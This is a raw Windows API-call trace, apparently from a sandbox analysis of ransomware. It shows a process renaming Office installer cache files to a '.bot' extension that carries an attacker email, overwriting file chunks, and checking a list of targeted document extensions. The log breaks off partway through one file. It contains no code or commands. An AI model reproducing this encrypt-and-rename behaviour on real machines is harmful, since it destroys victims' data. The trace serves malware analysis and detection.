	[0046.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.539] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.539] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.539] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.578] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.579] ReadFile (in: hFile=0x200, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.631] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.631] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.631] ReadFile (in: hFile=0x200, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.732] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.732] WriteFile (in: hFile=0x200, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0047.653] SetEndOfFile (hFile=0x200) returned 1
	[0047.654] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0047.658] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.658] WriteFile (in: hFile=0x200, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.659] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.659] WriteFile (in: hFile=0x200, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.662] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.662] WriteFile (in: hFile=0x200, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.664] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0047.664] CloseHandle (hObject=0x200) returned 1
	[0047.664] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.665] lstrlenW (lpString=".doc") returned 4
	[0047.665] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0047.665] lstrlenW (lpString=".docx") returned 5
	[0047.665] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0047.665] lstrlenW (lpString=".pdf") returned 4
	[0047.665] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0047.665] lstrlenW (lpString=".xls") returned 4
	[0047.665] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0047.665] lstrlenW (lpString=".xlsx") returned 5
	[0047.665] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0047.665] lstrlenW (lpString=".ppt") returned 4
	[0047.665] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.665] lstrlenW (lpString=".zip") returned 4
	[0047.665] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0047.665] lstrlenW (lpString=".rar") returned 4
	[0047.665] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0047.665] lstrlenW (lpString=".bz2") returned 4
	[0047.665] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0047.665] lstrlenW (lpString=".7z") returned 3
	[0047.665] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.665] lstrlenW (lpString=".dbf") returned 4
	[0047.665] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.665] lstrlenW (lpString=".1cd") returned 4
	[0047.665] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0047.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".jpg") returned 4
	[0047.666] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".doc") returned 4
	[0047.666] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0047.666] lstrlenW (lpString=".docx") returned 5
	[0047.666] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0047.666] lstrlenW (lpString=".pdf") returned 4
	[0047.666] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0047.666] lstrlenW (lpString=".xls") returned 4
	[0047.666] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0047.666] lstrlenW (lpString=".xlsx") returned 5
	[0047.666] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0047.666] lstrlenW (lpString=".ppt") returned 4
	[0047.666] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".zip") returned 4
	[0047.666] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0047.666] lstrlenW (lpString=".rar") returned 4
	[0047.666] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0047.666] lstrlenW (lpString=".bz2") returned 4
	[0047.666] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0047.666] lstrlenW (lpString=".7z") returned 3
	[0047.666] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".dbf") returned 4
	[0047.666] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".1cd") returned 4
	[0047.666] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0047.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77
	[0047.666] lstrlenW (lpString=".jpg") returned 4
	[0047.667] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0047.667] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0047.667] lstrlenW (lpString="Office32WW.msi") returned 14
	[0047.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.273] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1992192) returned 1
	[0048.273] CloseHandle (hObject=0x214) returned 1
	[0048.273] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020
	[0048.273] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.273] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0048.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.274] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0048.274] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.274] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.277] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.278] ReadFile (in: hFile=0x214, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.283] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0048.283] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.283] ReadFile (in: hFile=0x214, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0048.298] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.298] WriteFile (in: hFile=0x214, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0048.481] SetEndOfFile (hFile=0x214) returned 1
	[0048.481] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0048.481] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.481] WriteFile (in: hFile=0x214, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.482] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.483] WriteFile (in: hFile=0x214, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.484] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0048.485] WriteFile (in: hFile=0x214, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0048.486] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0048.487] CloseHandle (hObject=0x214) returned 1
	[0048.487] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0048.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.487] lstrlenW (lpString=".doc") returned 4
	[0048.487] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0048.487] lstrlenW (lpString=".docx") returned 5
	[0048.487] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0048.487] lstrlenW (lpString=".pdf") returned 4
	[0048.487] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0048.487] lstrlenW (lpString=".xls") returned 4
	[0048.487] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0048.487] lstrlenW (lpString=".xlsx") returned 5
	[0048.487] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0048.487] lstrlenW (lpString=".ppt") returned 4
	[0048.487] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0048.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.487] lstrlenW (lpString=".zip") returned 4
	[0048.487] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0048.487] lstrlenW (lpString=".rar") returned 4
	[0048.487] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString=".bz2") returned 4
	[0048.488] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0048.488] lstrlenW (lpString=".7z") returned 3
	[0048.488] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString=".dbf") returned 4
	[0048.488] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString=".1cd") returned 4
	[0048.488] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString=".jpg") returned 4
	[0048.488] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString=".doc") returned 4
	[0048.488] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0048.488] lstrlenW (lpString=".docx") returned 5
	[0048.488] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0048.488] lstrlenW (lpString=".pdf") returned 4
	[0048.488] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString=".xls") returned 4
	[0048.488] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString=".xlsx") returned 5
	[0048.488] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0048.488] lstrlenW (lpString=".ppt") returned 4
	[0048.488] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.488] lstrlenW (lpString=".zip") returned 4
	[0048.488] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString=".rar") returned 4
	[0048.488] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0048.488] lstrlenW (lpString=".bz2") returned 4
	[0048.488] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0048.489] lstrlenW (lpString=".7z") returned 3
	[0048.489] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0048.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.489] lstrlenW (lpString=".dbf") returned 4
	[0048.489] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0048.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.489] lstrlenW (lpString=".1cd") returned 4
	[0048.489] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0048.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0048.489] lstrlenW (lpString=".jpg") returned 4
	[0048.489] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0048.489] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0048.489] lstrlenW (lpString="PrjProrWW.msi") returned 13
	[0048.489] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0048.987] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=10798080) returned 1
	[0048.987] CloseHandle (hObject=0x21c) returned 1
	[0048.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020
	[0048.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.987] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0048.988] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0048.988] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0048.988] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0048.988] ReadFile (in: hFile=0x21c, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.699] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.701] ReadFile (in: hFile=0x21c, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.796] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0049.796] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0049.797] ReadFile (in: hFile=0x21c, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0049.814] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.814] WriteFile (in: hFile=0x21c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0106, lpOverlapped=0x0) returned 1
	[0049.940] SetEndOfFile (hFile=0x21c) returned 1
	[0049.940] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xbb50050
	[0050.208] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.209] WriteFile (in: hFile=0x21c, lpBuffer=0xbb50050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xbb50050*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.276] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.276] WriteFile (in: hFile=0x21c, lpBuffer=0xbb50050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xbb50050*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.278] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.278] WriteFile (in: hFile=0x21c, lpBuffer=0xbb50050*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xbb50050*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.283] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb50050 | out: hHeap=0x7d60000) returned 1
	[0050.283] CloseHandle (hObject=0x21c) returned 1
	[0050.283] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
